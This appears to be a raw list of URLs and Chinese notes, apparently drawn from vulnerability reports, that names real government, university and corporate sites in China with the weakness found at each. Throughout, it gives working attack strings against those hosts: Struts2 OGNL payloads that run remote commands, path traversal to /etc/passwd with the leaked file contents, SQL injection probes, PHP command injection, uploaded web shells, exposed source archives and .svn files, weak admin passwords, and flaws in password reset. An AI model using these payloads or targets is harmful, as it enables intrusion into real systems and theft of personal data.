http://www.hzfc.gov.cn/UserFiles/File/news/youxian.txt http://rsj.sdqixia.gov.cn/upload_files/files/20130606_020028.txt http://www.ycfgj.gov.cn/news/soft/yh.txt http://10000.gd.cn/wangyuntest/ http://10000.gd.cn/wangyuntest.zip http://itoms.open.com.cn/Admin/index.aspx http://team.360shop.com.cn/register.php http://team.360shop.com.cn/?mod=acp&do=acp_bug_info&id=388 http://www.szzfgjj.com/szgjj/Guestbook.jspx http://szzfgjj.com/szgjj/SearchMsg.jspx?ctgId= http://xss.webvul.com/5NVhnS http://www.gzal.gov.cn/index.htm http://www.tghl.gov.cn/baijia/ http://www.hebfxgt.gov.cn/Uploadfile/wps/2009-5/index.htm http://www.fcwgx.gov.cn/uploadfile/CSS/windows/fun14-528.htm http://www.hanyang.gov.cn/html/qtjj/9847/index.html www.lnlaw.gov.cn:5515/ www.lnlaw.gov.cn:100/ www.lnlaw.gov.cn:7145/ www.lnlaw.gov.cn:3047/ www.lnlaw.gov.cn:3494/ www.lnlaw.gov.cn:4479/ http://www.sczyjj.gov.cn/quanxunwang/ http://www.cmkj.gov.cn/bcwkh/ http://www.yhfgj.gov.cn/js/ http://www.jnipo.gov.cn/zhuanti/1100/ http://www.aqdz.gov.cn/include/images/568/ http://ets-ccaa.open.com.cn/Va_username.aspx?username=iris_wan2011 http://www.zte-d.com/html.rar 
http://mail.zdnet.com.cn/html/login.php?Lang=invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin netdump:x:34:34:Network user:/var/crash:/bin/bash nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin mysql:x:500:500::/export/home/db/mysql:/bin/bash alias:x:501:501::/var/qmail/alias:/sbin/nologin qmaild:x:502:501::/var/qmail:/sbin/nologin qmaill:x:503:501::/var/qmail:/sbin/nologin qmailp:x:504:501::/var/qmail:/sbin/nologin qmailq:x:505:502::/var/qmail:/sbin/nologin qmailr:x:506:502::/var/qmail:/sbin/nologin qmails:x:507:502::/var/qmail:/sbin/nologin vpopmail:x:89:89::/home/vpopmail:/bin/bash clamav:x:508:503::/home/clamav:/bin/false qscand:x:509:504::/home/qscand:/bin/false 
nasaexec:x:672:672:NASA nasaexec:/bin/bash lyb:x:0:0::/home/lyb:/bin/bash yalino:x:0:0::/home/yalino:/bin/bash http://153.cn/feedback.do http://app.open.com.cn/applyusing.aspx www.mayizhaopin.com http://www.gansu.gov.cn/jiep/objectbox/selectx_userlist.jsp http://101.66.251.195/login.php http://wkf.shu.edu.cn/login.aspx http://www.scjm.gov.cn:8080/gov/page/NewsQuery_n.jsp?ID=275 http://www.scjm.gov.cn:8080/gov/page/download.jsp?file=../../gov/page/OB_NEW_SHOW.jsp http://www.scjm.gov.cn:8080/gov/page/download.jsp?file=../../gov/page/hyxh.jsp http://dlut.open.com.cn/console.dep http://wo.zdnet.com.cn/comment/fy1.php?mit&replay&pkid=[注入点]&id=comma&type=A&page=1 http://wo.zdnet.com.cn/comment/fy1.php?m http://wo.zdnet.com.cn/comment/fy1.php?mit&replay&pkid=4&id=comma&type=A&page=1 http://my.hxsd.com/user/pm/messages.html http://bbs.webscan.360.cn/ http://eduadmin.open.com.cn/ http://eduadmin.open.com.cn/learningCenter/tgregister/checkordercode.aspx http://bbs.proxycn.cn/hack.php?H_name=xqqiandao&qdorder=20 http://edun.hzcnc.com/kr_detail.asp?id=3488 http://www.78app.com/1.php www.dingjianshishang.com/login.php www.twsp8.com/?do=count&mod=ucp http://www.twsp8.com/?class_id=5&do=index&mod=../../../../../../../../../../etc/passwd%00.jpg&per_page=80&sway=list http://www.twsp8.com/?do=../../../../../../../../../../etc/passwd%00.jpg&is_type=is_new&mod=goods http://www.zjredcross.org.cn/web/comm/videoDetail.jsp?MenuIds=47 inurl:student_info1.aspx http://kefu.linekong.com/eService/system/inputLogin.do?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 http://touzi.gov.cn/ 
http://121.199.10.229/Yooli_1.0.8.apk http://gjzx.nwu.edu.cn/ http://218.94.30.9/ http://218.94.30.9:8080/JSJG/Silic.jsp http://opac.jxlib.gov.cn/ntbookretrtopshowrig http://bbs.hxsd.com/newthread.php?do=postthread&f=419 http://w.cn/help.php?m=index&a=operate&itemid=36922427&type=3,源码钟发现通过手机+验证码删除帖子的API没做验手机校验码,可直接删除帖子。 http://218.108.73.82 http://218.108.73.82/codebase/ m.oppo.com/login.html http://yt.linekong.com/wj_image.php?image_id=1701 http://yt.linekong.com/morei.php?sort_id=23 http://foreign.jlu.edu.cn/ http://life.jlu.edu.cn http://sf.jlu.edu.cn http://art.jlu.edu.cn/dwgz_c.php?file_id=1039 http://cbae.jlu.edu.cn/articles.php?id=1582 http://xy.linekong.com/wallpaper.php?sort_id=43&page=1 http://xy.linekong.com/picture.php?sort_id=44&page=1 http://xy.linekong.com/special/oneyear/index.php?article_id=1414 http://xy.linekong.com/special/war_of_camps/?article_id=1149 http://www.jhxcb.gov.cn/ http://dag.swu.edu.cn/index/ www.dgdianxin.com http://www.bozhou.gov.cn:81/bzssq/mainFrame.do http://www.hzim.org/sign/score.php?type=csh&idnum=1 http://service.chinamobiledevice.com.cn/System/Login.aspx http://ltdx.sp.169ol.com/list_elite.php?elite=1 http://ltdx.sp.169ol.com/list_type.php?type_ID=1 http://tv.jlu.edu.cn:80/v2/index.php?o=showc;id=1,参数id没有过滤。 http://www.pingpang.10010.com/马赛克/login.php。 http://uu.xunlei.com/scriptresource.axd?d=1AAoAAAAAAAAAAAAAAAAACFI7q3lw-OmMyL7_-33DMUAAAAAAAAAAAAAAAAAAAAA0 http://kjcg.jlu.edu.cn/pages/introduction/read.aspx?flag=8,参数flag没有过滤 http://www.tj10010.com:8080/wopai/confirmnumber?number= http://www.changtu.gov.cn/index.htm http://content.pp.cc/ctpanel/login.php http://xxgk.jiangyan.gov.cn/xxgk/workflow/objectbox/selectx_userlist.jsp http://xxgk.nbhtz.gov.cn/gxxxgk/workflow/objectbox/selectx_userlist.jsp http://xxgk.yichang.gov.cn/gov/workflow/objectbox/selectx_userlist.jsp http://xxgk.ouhai.gov.cn/xxgk/workflow/objectbox/selectx_userlist.jsp http://xxgk.ycxl.gov.cn/gov/workflow/objectbox/selectx_userlist.jsp 
http://tieba.baidu.com/home/main/?un=%c0%ee%d1%e5%ba%ea http://c.tieba.baidu.com/c/u/user/profile http://c.tieba.baidu.com/c/u/user/profile?pn=1&rn=200&uid=79&sign=3E45F58F284D4A01AC4319F5AECC6FC2 http://t.hexun.com/23795498/default.html http://res.ks.91.com/Upload/theme/image.aspx http://resmgt.sj.91.com/Upload/Theme/2013/5/28/a.asp/1.zip http://yanzhao.bsu.edu.cn/news/Shownews.asp?id=31 http://yanzhao.bsu.edu.cn/news/Shownews.asp http://xq.bsu.edu.cn/my http://weipai.baidu.com/photo/getalbumpic?city_name=%E5%85%B0%E5%B7%9E%E5%B8%82,%E5%A4%A9%E6%B0%B4%E5%B8%82,%E6%B1%89%E4%B8%AD%E5%B8%82,%E7%BB%B5%E9%98%B3%E5%B8%82&end_date=2014-02-17&start_date=2014-02-02&un=732340Mark http://tv.tom.com/App_User_UserUpload.php?type=1&user_id=1 http://tv.tom.com/App_User_UserUpload.php?type=1&user_id=1 http://211.138.112.80:8080/dbs/ www.189.cn,选择山西省,然后点登陆,在登陆界面点击找回密码选项。 http://www.189.cn/dqmh/managePwdAction.do?method=resetPassWord http://www.linekong.com/pay/sk_core.php?city=%E5%AE%89%E5%BE%BD http://www.linekong.com/pay/xk.php?city= http://ss.linekong.com/xml/index1.php?sort_id=43%22/ http://yb.linekong.com/morei.php?sort_id=223 http://yt.linekong.com/voting.php?types=radio&vote_id=33 http://yt.linekong.com/wj_image.php?image_id=11378 http://xyhj.linekong.com/painting.php?sort_id=44&page=1 http://xyhj.linekong.com/wallpaper.php?sort_id=43&page=1 inurl:php?+You http://bjmh.mau.edu.cn/news.php?cid=1 http://www.yqchinwin.com/index.html http://shopware.hitao.com/dorado/console.d http://kx.linekong.com/include_jsjs.php?article_id=1 http://bbs.lm.8864.com/forum.php http://ms.linekong.com/activity/clan/_do_getPlayerList.ajax.php http://u.mbaobao.com/ http://u.mbaobao.com/index.php?option=com_website&task=edit&cid[]=13497 http://u.mbaobao.com/index.php?option=com_website&task=edit&cid[]=13487 http://u.mbaobao.com/index.php?option=com_website&task=edit&cid[]=13485 http://www.huoying.com/activity/voting/personInfor.php?name=zhang0671 http://kefu.linekong.com/eService/system/inputLogin.do 
http://mail.7k7k.com/login.php Cookie:LoginDomain= http://www.qzdatasoft.com:81/jiaowu2008/JwGl/DelAccessID.asp?Datetime=2014-02-28%2015:57:36&AccessID=20140228155736.4847223 http://gzwtqx.com/ http://www.ynxdfpr.com/ http://hnwtqx.com/ http://gzwtqx.com/ http://sxwtqx.com/ http://linxi.gov.cn/test.php?id=547 http://www.75510010.com/adv/sz10010.aspx?sid=201402131635442602 http://www.xdfce.cn/ http://www.xdfce.cn/xdfadmin/login.php?gotopage=%2Fxdfadmin%2Findex.php http://www.ccxdf.cn/ http://www.pzhdqedu.gov.cn/php/wzgl/wzgl_show.php?id=588 http://www.10010tianjin.com:8080/wopai/confirmnumber?number= http://xt.10010jia.com/search.aspx?brand=1398 http://xt.10010jia.com/Search.aspx?LoSearch=&Locals=ls&type=&searchWord= http://xt.10010jia.com/search.aspx?promotion=&type=&searchWord=&brand=&listType=&orderField=SalesNumber&LoSearch= http://xt.10010jia.com/Search.aspx?searchWord=&brand=1092 http://xt.10010jia.com/search.aspx?chufang=1&cfid=&type=-99&searchWord=&brand=&listType=&orderField=SalesNumber&LoSearch= http://xt.10010jia.com/Search.aspx?LoSearch=&Locals=ls&chufang=1&cfid=1&type=3778&searchWord= http://xt.10010jia.com/ServiceStation/NewServicePro.aspx?sCustCode=1569401 http://mtdz.org/ http://wxdianxin.com/ http://218.7.20.53:8080/ http://yjsb.tjpu.edu.cn/degree.php?sortid=14 http://yjsb.tjpu.edu.cn/ http://myjob.dlmu.edu.cn/rili/admin/cal_user.php这个地方存在弱口令(admin http://panda.sj.91.com/NewPanda/Novel/SubjectList.aspx?id=300 http://skzzf.com/ http://vote.hsw.cn/vote_show.php?vote_id=100000001111 http://jy.scu.edu.cn/jiuye/shownews.php?type_id=5&newsid=15135 http://tms.byd.com.cn/system/login!loginSSO.action http://xlfc.changyou.com/template/shop/images/more_news_title_bar_bgs.jsp http://www.lemo.me/backstage/s_login.aspx http://www.qhsw.gov.cn/viewnews.php?id=34 http://usercms.hxsd.com/admincp/archive.php?do=add&channelid=47 http://www.4006055885.com/ http://sh.qihoo.com/zt/lianghui2014/index.html 
http://vote2.gmw.cn/poll.php?action=choose&inajax=1&handlekey=pollresult&id=59&formhash=5148ab9c&iframe=1&bgcolor=FFF&choose_value=290 http://mis.jj-inn.com/jmx-console/HtmlAdaptor?action=displayMBeans http://mis.jj-inn.com/web-console/ http://mis.jj-inn.com/index.jsp http://union.xiu.com/monitor/jvm/login.jsp http://www.wasu.org/ http://211.90.245.135/IOS/login.do http://www.gsta.com/ http://www.jntrade.gov.cn/yp/web/index.php?userid=yy&menu=1;echo+phpinfo%28%29;exit%28%29 http://new.edingcn.com/install/index.php网站主页,可以在这里购买店铺,然后装修,只不过全都是小吃的店铺,不过也是要花不少钱的。 http://new.edingcn.com/admin/index.php?act=login&op=login http://new.edingcn.com/index.php?act=louceng&op=list&sc_id=91&sc_parent_id=88 http://edingcn.com/admin/index.php?act=login&op=login找到一个家工厂的登录页面。应该还有一个,不去找了,先登录第一个后台,看看功能。 http://hk.chinaunicom.com/hkunicom/portal/news_queryNewscontent.action http://www.xfjr.gov.cn/SysAdmin/ http://nz.xfjr.gov.cn/UserRegCheck.asp?username= http://nz.xfjr.gov.cn/UserRegCheck.asp?username= http://www.xfjr.gov.cn/web.rar http://www.china-seeq.com/questionInves/pilupdf.jsp?url=/home/tomcat/apache-tomcat-6.0.35/webapps/mgt/WEB-INF/web.xml http://www.taobao.com/go/act/ebook/ebook_th_khy.php?spm=a1z02.1.882417833.d4911913.A5FgOq&scm=1217.1.1.375 http://thboss.taobao.com/activity/sendAppUrlBySms.do?phone=186******88&type=2&_ksTS=1394089612815_22&callback=jsonp23 javascript:shellcode http://www.china-see.com/hqsj-1.jsp?rightType=1&cid=&fid=&gqdm=100002 http://golf.cctv.com/function/2013gold_court/courtlist.php?area=q http://www.gzaipu.com/ http://www.zdkj.gov.cn/list.asp?id=674 http://jxzx.jmi.edu.cn/report/xscj_report.aspx?xh=083706130101 http://jw.hbliti.com/report/xscj_report.aspx?xh=1005021322 http://60.190.131.220/report/xscj_report.aspx?xh=0802100214 http://login.hxsd.com/index.php http://bbs.hxsd.com http://yyxy.neuq.edu.cn/plus/recommend.php http://vip.xj.189.cn/Club_Area/hdInfo_currt.aspx?clubno=10105024 http://xw.zqgame.com/web.rar 
http://pingpangchina.com/registerPersonal.action http://hrm.snhr.gov.cn/login.asp https://iforgot.apple.com/password/authenticationmethod?sstt=R%2F4lq8RPm3SXywUjw3WSWK4OaOuL4a7kr0eJS%2Bi6pFREEtFDf1eE6bRwVmrd8WqoGjJVmgBkGllnXa82TLvP%2BlM5Q%2BMl3dfR4XrO7pitq6MwgkBQydfdts0ZIVIJ7jBqYS%2FhM5avMdmbpeWIjjXHZjfv7tBfqw4QAAAAAAAAAAE%3D http://ibi.hzau.edu.cn/clstest/researchers.php?id=120,这个表单存在注入,参数id存在问题 http://m.elong.com/train/order?durationtime=5:36&startdate=201403080700&startstation=%E5%8C%97%E4%BA%AC%E5%8D%97&enddate=201403081236&endstattion=%E4%B8%8A%E6%B5%B7%E8%99%B9%E6%A1%A5&seatlowprice=933&seatname=%E4%B8%80%E7%AD%89%E5%BA%A7&seatcode=M&trainno=G101 http://office.homeinns.com/staffinfo/SMDocument/Upload/2010-5-1317430.xls http://office.homeinns.com/staffinfo/OCSDocument/Upload/2013-8-27162223.xlsx http://office.homeinns.com/staffinfo http://t.gmw.cn http://open.kingdee.com/K3Cloud/CDPPortal/App.aspx?id=107986 http://open.kingdee.com/K3Cloud/CDPPortal/App.aspx?id=107986/**/and/**/1=1 http://open.kingdee.com/K3Cloud/CDPPortal/App.aspx?id=107986/**/and/**/1=2 http://my.pclady.com.cn/user/diaryform.jsp www.jiapin.com和jiapin.com得到的ip地址不一样。 http://www.anzhuoapk.com/ http://219.140.166.20/marriage/sysweb/login.action http://wap.lnpu.edu.cn/ http://wap.lnpu.edu.cn/news/showOne?wbnewsid=180721&wbtreeid=12721 http://jwcweb.lnpu.edu.cn:7001),加之之前获得的信息,登录学生和教师的账户,查询或修改成绩: http://jiaofei123.com/pay/cellphone/query.do?phoneNumber=15320727507 https://www.cmpassport.com/后, http://cms.kingdee.com/solutions/business/manufacture/manufactureCaseList.jsp?columnId=150201301401,150202301401,150202302401,150202303401 http://cms.kingdee.com/solutions/business/scm/scmCaseList.jsp?columnId=151201301,151202301 http://ma.apps.cctv.com/Enterprise/EnterpriseInsert.jsp http://exam.gmw.cn/xieliu/images/banner/Accountant/1.jpg(如图) http://exam.gmw.cn/xieliu/images/banner/Accountant/1.jpg/1.php http://tg.gmw.cn/vote/index.php?id=30 http://tg.gmw.cn/install/ 
http://www.hnisi.com.cn/fckeditor/editor/ http://www.hnisi.com.cn/fckeditor/editor/filemanager/connectors/php/x.php http://www.hnisi.com.cn/sino.php http://www.hnisi.com.cn/fckeditor/editor/filemanager/connectors/4.php 2012.moban.siteserver.cn/siteserver/platform/modal_hotfixUpload.aspx http://2012.moban.siteserver.cn/siteserver/platform/modal_progressBar.aspx?isDownload=True&hotfix=True这个连接的时候,我们还需要将返回包修改,修改方法参见第一步!部分如下: www.bctf.cn http://app.zj165.com http://cps.gome.com.cn/fckeditor/editor/filemanager/browser/default/connectors/test.html http://cam.inc.hc360.com/AccessRes/ http://cam.inc.hc360.com/AccessRes/GetNewCheck.aspx http://cam.inc.hc360.com/AccessRes/ResourceAdj.aspx http://cam.inc.hc360.com/AccessRes/ResourceImport.aspx http://dev.szlt.net/files/slideshow/page/phpinfo.gif/.php https://mail.bankcomm.com/ http://bbs.52pk.com/forum.php?mod=viewthread&tid=6397515&page=1&extra=#pid31108589 http://publicquery.sipo.gov.cn/ http://www.spb.gov.cn/folder9/folder2047/index.html http://zyjd.spb.gov.cn/uploadaction!befforeWai.action?filetype=1 http://account.oppo.com/index.php?q=user/resetPass&username= http://account.oppo.com/index.php?q=user/resetPass&username=【客服】-吻川 http://www.oatos.com/casestudy/ http://app.oatos.com/os/admin.html http://219.148.23.14/clerk_communication/getdata.aspx?action=GetCity2&pcode=* http://219.148.199.8/clerk_communication/getdata.aspx?action=GetCity2&pcode=* http://219.143.125.111/clerk_communication/getdata.aspx?action=GetCity2&pcode=* http://115.168.67.196/clerk_communication/getdata.aspx?action=GetCity2&pcode=* http://222.85.88.201/clerk_communication/getdata.aspx?action=GetCity2&pcode=* http://116.228.55.12/clerk_communication/getdata.aspx?action=GetCity2&pcode=* http://61.191.40.114/clerk_communication/getdata.aspx?action=GetCity2&pcode=* http://219.148.199.8/clerk_communication/getdata.aspx?action=GetCity2&pcode=* http://219.148.23.14/clerk_communication/getdata.aspx?action=GetCity2&pcode=* 
http://115.168.67.196/clerk_communication/getdata.aspx?action=GetCity2&pcode=* http://202.100.202.56/zk/main/get_pass.php http://www.google.de/#newwindow=1&q=inurl:riseapprove_web http://www.chinapost.com.tw/guidepost/topics/default.asp?id=3577&sub=10 http://www.super.cn http://yddx.ydkgjt.com/phpmyadmin/地址 http://pianke.me/timeline/ http://c22.cmvideo.cn/weibo-portal/ http://c22.cmvideo.cn/weibo-portal/test/UserInfoTaglibs.jsp http://pianke.me/posts/5319be957f8b9a266500004c.html?f=homepage http://www.lajy.net/list/jgcs.php?id=127 http://oa.ncu.edu.cn/icons/index1.html http://www.m1905.com/special/mshow.php?contentid=1109&specialid=356&tpl=freshman_file http://www.m1905.com/special/mshow.php?contentid=1109%20and%201=1&specialid=356&tpl=freshman_file http://www.m1905.com/special/mshow.php?contentid=1109%20and%201=2&specialid=356&tpl=freshman_file www.m1905.com/specia/mshow.php?contentid=1109&specialid=356&tpl=freshman_file http://223.2.10.25/cas/login.action http://223.2.10.26/cas/login.action http://223.2.10.27/cas/login.action http://223.2.10.27/cas/login.action?class.classLoader.jarPath=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean%28false%29,%23_memberAccess[%22allowStaticMethodAccess%22]=true,%23req=@org.apache.struts2.ServletActionContext@getRequest%28%29,%23a=%40java.lang.Runtime%40getRuntime%28%29.exec%28%23req.getParameter%28%22cmd%22%29%29.getInputStream%28%29,%23b=new+java.io.InputStreamReader%28%23a%29,%23c=new+java.io.BufferedReader%28%23b%29,%23d=new+char[50000],%23c.read%28%23d%29,%23s3cur1ty=%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29,%23s3cur1ty.println%28%23d%29,%23s3cur1ty.close%28%29%29%28aa%29&x[%28class.classLoader.jarPath%29%28%27aa%27%29]&cmd=cmd%20/c%20set http://61.187.56.156:9090 http://221.204.214.88/portal/doLogonAction!doLogon.action http://www.js.chinaunicom.com/shop/template/shop/order_query.shtml www.youyouwin.com”,标题:游戏共赢。首先来说一下我是如何确定这个网站是奇客星空旗下的 
http://sns.people.com.cn/下修改个人信息时,有一项是有真实名字的,这里我插入xss代码 qm.zj165.com/sign/news.do?method=showServiceAndHelp&newid=254ACC7AE95D42C297372E11D4DA46E4 http://cnpps.gmw.cn/ http://118.194.32.61/Login.aspx http://118.194.32.61/FCKeditor/editor/fckeditor.html,点击插入图片,然后浏览服务器: http://www.hnair.com/ServiceSupervice_net/ComplaintManage/OutSiteAddForm.aspx www.hnair.com http://www.jscz.gov.cn/pub/jscz/kfcx/ www.jscz.gov.cn/pub/message/kjksfscm.jsp http://www.harczx.gov.cn/cjcx/index.asp www.harczx.gov.cn/cjcx/searchzj.asp http://123.232.125.172:8080/welcome.do http://en.kingdee.com/index.php?option=com_ninj http://e.mosh.cn/contectus/getContent?a_id=4 http://e.mosh.cn/god/getcontent?a_id=62 http://www.jssonghe.cn http://wd.koudai.com/s/2325615 http://202.100.81.123/arweb/table.jsp?hospital=lshzyy http://www.xiamenair.com/test.html http://webcheckin.travelsky.com/webcki/backQuery.do?orgId=MFAIRNEW&pwid=MF_CN http://xs.zj165.com/IOS/.svn/entries http://url/@api/host/version http://url/@api/deki/groups http://url/@api/deki/site/roles http://url/@api/deki/site/services http://url/@api/deki/users http://url/@api/host/blueprints http://www.mafengwo.cn/shop/mgr_item.php?act=add&item_name=lgkcaleg&item_price=1&shop_id=100597 www.mafengwo.cn/shop/mgr_item.php?act=add&item_name=lgkcaleg&item_price=1&shop_id=100597 http://shop.xiamenair.cn/ www.dianwoba.com/comment!getAllMicroblog.do?keyword=0&keywordtype=1&page=1&pagesize=10&showtype=2&start=0&t=1394325365091 www.dianwoba.com/comment!getAllMicroblog.do?keyword=0&keywordtype=1&page=1&pagesize=10&showtype=2&start=0&t=1394325365091 http://218.207.217.37/IVBSYS/member/login.html admin:123456。登录后可以推送消息到通知栏、推送更新、修改APP的启动闪屏等。 http://www.cm-analysis.com/ http://www.cm-analysis.com/logos/20140309/a41e26b2b0588b31e011d72ea8a84325.php http://shop.letv.com/goPay.html?amount=3489&pId=ON-LEZF-ALIPAY-BALANCE-ALP&oId=1403071626642&stage=1&pInfo=ON-LEZF-ALIPAY-BALANCE-ALP_0_0_3489 
http://shop.letv.com/goPay.html?amount=0.1&pId=ON-LEZF-ALIPAY-BALANCE-ALP&oId=1403071626642&stage=1&pInfo=ON-LEZF-ALIPAY-BALANCE-ALP_0_0_0.1 http://cbnclub.yicai.com/.svn/entries http://subscribe.yicai.com/.svn/entries http://thinking.yicai.com/.svn/entries http://cbnclub.yicai.com/.svn/entries http://cfv.yicai.com/2009.zip http://cfv.yicai.com/wwwroot.zip http://cfv.yicai.com/2010.zip http://pan.baidu.com/s/1o6sdikU https://www.yypt.com/finance/regist!sendValidateCode.do?0.012081895545985044&mobile=150*******1 https://www.yypt.com/finance/regist!sendValidateCode.do?0.18127401016843408&mobile=150********1 http://www.osrqd.com/HQWCMS/login_login.action height:100%;width:100;position:fixed http://manual.hnair.com/ http://manual.hnair.com/planmanual/planmanual.rar http://220.191.180.230/login.jhtm http://1.dximscreenshot3.yy.yysratic.com/snd_27/46/48/800-9c45ca45a7e8d61848cOa.aud[/dysnd][dyimg http://dzsw.mofcom.gov.cn/login/login.jsp http://dcscyxs.mofcom.gov.cn/questionnaire/300and600/login.jsp?pro_id=6353260&type=1 http://dingzhi.acs.gov.cn/MofCom/updatenew/frame_dc.jsp http://i.koolearn.com/infocenter/priMsg?page= http://rsc.its.csu.edu.cn/web.rar/code www.damai.cn/ajaxArtist.aspx?aleph=st07UiiJ&areaID=1&sex=&type=3&vocation=&_=1394371324365s www.damai.cn/ajaxArtist.aspx?keyword=DGU7u23L&type=3&_=1394371394323 www.damai.cn/ajaxArtist.aspx?aleph=&areaID=1&sex=&type=3&vocation=flrDUByf&_=1394371324365 http://www.hljsch.com/Checksearch/Checkinfo.aspx?checkId=9745757 http://www.gdxxws.com/Checksearch/Checkinfo.aspx?checkId=9745757 http://www.hljsch.com/Jkhzb/jkhzbprint.aspx?rid=2&schoolbh=2306&stjnd=20131&schooltype=0'&tjtype=1 http://jyxx.shumc.edu.cn/adminiscentertrator/AdmLogin.asp http://202.121.244.134/adminiscentertrator/AdmLogin.asp http://jiuye.sbs.edu.cn/adminiscentertrator/AdmLogin.asp http://job.xq.sh.cn/adminiscentertrator/AdmLogin.asp http://www.lidapoly.com/job/adminiscentertrator/AdmLogin.asp http://job.sicfl.edu.cn/adminiscentertrator/AdmLogin.asp 
http://job.smic.edu.cn/adminiscentertrator/AdmLogin.asp http://jyxx.sihs.edu.cn/adminiscentertrator/AdmLogin.asp http://item.taobao.com/item.htm?spm=a230r.1.14.1.5aail6&id=37643222453&qq-pf-to=pcqq.c2c http://tieba.baidu.com/game/browse/drawIndex?qq-pf-to=pcqq.discussion http://tieba.lecai.com/user/ajax_phone_authcode_send.php?mobile=150********1 http://wooyun.org/bugs/wooyun-2013-028083/trace/cb41b9ed8e389d6da2cd33f5b85701e2 http://demo.javapms.com/ http://demo.javapms.com/member/index.jsp http://sc.189.cn/internet/ftth/getFtthInfo.jsp,任意输入一个开通了宽带的手机号或者座机号(不加区号),在选好对应的城市。即可查询到安装者的住址等信息。 http://baike.baidu.com/view/51291.htm) http://daj.nc.gov.cn/morehc.asp?taskNo=001005001 http://dingyue.fumu.com/ http://www.szfcsc.com/web/PubInfo/ysxx.asp?ysxkz=2013001 http://www.dynasunhotel.com/room.asp?Id=125 www.ngcz.tv http://120.197.95.240:8080/login.action http://120.197.95.240:8080/css/jack.jsp) http://atpd.travelsky.com/ http://atpd.travelsky.com/InterfaceWebservice/大客户接口文档/航信接口平台使用手册V1.1.3版.doc www.zdnet.com.cn/files/daiyan/test.php view-source:http://www.zdnet.com.cn/files/daiyan/test.php www.zdnet.com.cn/files/ http://www.zdnet.com.cn/files/quest_openx_write.php http://www.zdnet.com.cn/files/search_all_techzone.php http://www.zdnet.com.cn/files/keyword_filter.php http://support.zte.com.cn/support/index.aspx url:http://support.zte.com.cn/support/admin/RegisterLDAP.aspx url:http://support.zte.com.cn/support/ascx/GetUser.aspx?userName=c intile:jspspy,搜到的 http://rs.hntelecom.net.cn/ http://122.202.164.10:8080/portal/后面加任意参数跳转到错误页面然后审查元素修改url www.nearme.com.cn www.oppo.com能否登录 http://mall.cntv.cn http://itv.v3.js.ct10000.com/mystruts/login_realTimeSendInfo.action http://www.csp.gov.cn/ 